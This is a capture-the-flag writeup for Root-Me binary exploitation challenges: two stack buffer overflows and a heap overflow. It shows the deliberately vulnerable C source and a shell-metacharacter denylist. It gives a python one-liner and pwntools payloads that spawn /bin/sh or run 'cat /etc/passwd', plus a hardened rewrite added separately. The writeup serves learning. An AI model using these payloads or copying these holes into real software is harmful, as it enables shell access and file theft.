# Try hard www.root-me.org (Writeup)

- Try-hard categories
  - App - Script
  - App - System
  - Cracking

## App - Script

## App - System

### ELF x86 - Stack buffer overflow basic 1

```markdown
Start day: 13/03/2025
Level: Easy
Description: 5 Points
An intermediate level to familiarize yourself with stack overflows
```

| Protection | Description | Status |
| - | - | - |
| PIE | Position Independent Executable | x |
| RelRO | Read Only relocations | x |
| NX | Non-Executable Stack | x |
| Heap exec | Non-Executable Heap | x |
| ASLR | Address Space Layout Randomization | x |
| SF | Source Fortification | x |
| SRC | Source code access | v |

**Source code**

```c
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <stdio.h>

int main()
{
  int var;
  int check = 0x04030201;
  char buf[40];

  /* BOF: writes up to 45 bytes into the 40-byte buf */
  fgets(buf,45,stdin);

  printf("\n[buf]: %s\n", buf);
  printf("[check] %p\n", check);

  if ((check != 0x04030201) && (check != 0xdeadbeef))
    printf ("\nYou are on the right way!\n");

  if (check == 0xdeadbeef)
   {
     printf("Yeah dude! You win!\nOpening your shell...\n");
     setreuid(geteuid(), geteuid());
     system("/bin/bash");
     printf("Shell closed! Bye.\n");
   }
   return 0;
}
```

In this challenge, the buffer overflow (BOF) is in the line `fgets(buf, 45, stdin);`: **buf** is declared as 40 bytes, while the program allows input of up to 45 bytes.

=> The goal of this challenge: overwrite the value of the variable **check** with **0xdeadbeef**.

**POC**

```bash
python2 -c "print 'a' * 40 + '\xef\xbe\xad\xde'" | ./ch13
```

### ELF x64 - Basic heap overflow

```markdown
Start day: 13/03/2025
Level: Easy
Description: 10 Points
heap heap heap hooray
```

| Protection | Description | Status |
| - | - | - |
| PIE | Position Independent Executable | v |
| RelRO | Read Only relocations | v |
| NX | Non-Executable Stack | v |
| Heap exec | Non-Executable Heap | v |
| ASLR | Address Space Layout Randomization | v |
| SF | Source Fortification | x |
| SSP | Stack-Smashing Protection | x |
| SRC | Source code access | v |

**Source code**

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void checkArg(const char *a)
{
  while (*a)
    {
      if (   (*a == ';')
          || (*a == '&')
          || (*a == '|')
          || (*a == ',')
          || (*a == '$')
          || (*a == '(')
          || (*a == ')')
          || (*a == '{')
          || (*a == '}')
          || (*a == '`')
          || (*a == '>')
          || (*a == '<') ) {
        puts("Forbidden !!!");
        exit(2);
      }
      a++;
    }
}

int main()
{
  char *arg = malloc(0x20);
  char *cmd = malloc(0x400);
  setreuid(geteuid(), geteuid());

  strcpy(cmd, "/bin/ls -l ");

  printf("Enter directory you want to display : ");

  /* no length limit: overflows the 0x20-byte arg chunk */
  gets(arg);
  checkArg(arg);

  strcat(cmd, arg);
  system(cmd);

  return 0;
}
```

This challenge is about a heap overflow. The bug comes from `gets(arg);`, which lets the user write an unlimited amount of input into **arg**, which is allocated only 0x20 bytes on the heap.

=> Use this to overwrite the contents of **cmd**.

=> Execute a command to get a shell.
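A hardened input path for the two bugs described above (the `fgets(buf, 45, stdin)` size mismatch and the unbounded `gets(arg)`), given as an added example that is not part of the challenge source or the original writeup. The names `read_line_bounded` and `is_safe_dir_arg` are hypothetical; the sketch reads with the real buffer capacity, rejects oversized lines, validates with an allowlist, and runs `ls` without a shell.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Added example (hypothetical names). Read one line into dst: returns its
 * length, -1 on EOF/error, -2 if the line did not fit (rest is drained). */
int read_line_bounded(FILE *in, char *dst, size_t cap)
{
    if (cap < 2 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[n - 1] = '\0';
        return (int)(n - 1);
    }
    int c = fgetc(in);              /* no newline: EOF or oversized line? */
    if (c == EOF)
        return (int)n;
    while (c != '\n' && c != EOF)   /* drain so the tail is not read later */
        c = fgetc(in);
    dst[0] = '\0';
    return -2;
}

/* Allowlist (the challenge uses a denylist): path characters only,
 * non-empty, and no leading '-' that ls would parse as an option. */
int is_safe_dir_arg(const char *s)
{
    if (*s == '\0' || *s == '-')
        return 0;
    for (; *s; s++)
        if (!isalnum((unsigned char)*s) && !strchr("/._-", *s))
            return 0;
    return 1;
}

int main(void)
{
    char arg[0x20];                 /* same capacity as the challenge's arg */
    printf("Enter directory you want to display : ");
    fflush(stdout);
    if (read_line_bounded(stdin, arg, sizeof arg) < 0 || !is_safe_dir_arg(arg)) {
        puts("Rejected");
        return 2;
    }
    /* argv vector, no shell: the input is never parsed as a command line */
    execl("/bin/ls", "ls", "-l", "--", arg, (char *)NULL);
    return 1;                       /* reached only if execl failed */
}
```
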
**Payload**

```python
from pwn import *

p = process("/challenge/app-systeme/ch94/ch94")
payload = flat(
    b" " * 0x20,
    p64(0),
    p64(0x411),
    b"/bin/sh"
)
p.sendline(payload)
p.interactive()
```

Or

```python
from pwn import *

p = process("/challenge/app-systeme/ch94/ch94")
payload = flat(
    b" " * 0x30,
    # p64(0),
    # p64(0x411),
    b"cat /etc/passwd"
)
write("payload", payload)
p.sendline(payload)
p.interactive()
```

**POC**

![image](https://hackmd.io/_uploads/SytKQmln1l.png)

### ELF x86 - Stack buffer overflow basic 2

```markdown
Start day: 14/03/2025
Level: Easy
Description: 10 Points
An intermediate level to familiarize yourself with stack overflows
```

| Protection | Description | Status |
| - | - | - |
| PIE | Position Independent Executable | x |
| RelRO | Read Only relocations | x |
| NX | Non-Executable Stack | v |
| Heap exec | Non-Executable Heap | v |
| ASLR | Address Space Layout Randomization | x |
| SF | Source Fortification | x |
| SSP | Stack-Smashing Protection | x |
| SRC | Source code access | v |

**Source code**

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

void shell() {
    setreuid(geteuid(), geteuid());
    system("/bin/bash");
}

void sup() {
    printf("Hey dude ! Waaaaazzaaaaaaaa ?!\n");
}

void main()
{
    int var;
    void (*func)()=sup;
    char buf[128];
    /* writes up to 133 bytes into the 128-byte buf */
    fgets(buf,133,stdin);
    func();
}
```

## Cracking